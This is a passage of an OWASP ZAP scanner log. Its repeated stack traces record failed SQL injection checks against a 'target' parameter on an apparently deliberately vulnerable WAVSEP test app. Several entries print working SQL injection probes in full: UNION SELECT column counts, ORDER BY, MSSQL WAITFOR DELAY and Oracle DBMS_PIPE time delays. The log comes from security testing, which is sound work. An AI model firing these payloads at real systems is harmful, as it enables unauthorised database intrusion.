org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681358 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681359 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681360 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681360 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- DZzs] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- DZzs at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681362 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681363 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) AND 4287=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(110)||CHR(72)||CHR(88),5) AND (7233=7233] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) AND 4287=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(110)||CHR(72)||CHR(88),5) AND (7233=7233 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681364 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ ORDER BY 8576-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// ORDER BY 8576-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681364 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 1202=DBMS_PIPE.RECEIVE_MESSAGE(CHR(71)||CHR(99)||CHR(120)||CHR(68),5)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 1202=DBMS_PIPE.RECEIVE_MESSAGE(CHR(71)||CHR(99)||CHR(120)||CHR(68),5) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681365 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681365 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') AND 1861=DBMS_PIPE.RECEIVE_MESSAGE(CHR(87)||CHR(80)||CHR(105)||CHR(110),5) AND ('NAzZ'='NAzZ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') AND 1861=DBMS_PIPE.RECEIVE_MESSAGE(CHR(87)||CHR(80)||CHR(105)||CHR(110),5) AND ('NAzZ'='NAzZ at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681366 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681367 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681367 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' AND 6546=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(111)||CHR(114)||CHR(65),5) AND 'FSTS'='FSTS] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' AND 6546=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(111)||CHR(114)||CHR(65),5) AND 'FSTS'='FSTS at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: 